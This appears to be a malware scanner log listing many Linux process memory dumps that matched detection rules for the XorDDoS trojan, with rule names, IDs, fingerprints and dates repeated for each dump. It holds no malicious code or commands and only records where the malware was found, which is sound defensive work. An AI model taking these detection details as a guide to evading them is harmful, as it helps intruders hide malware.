Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
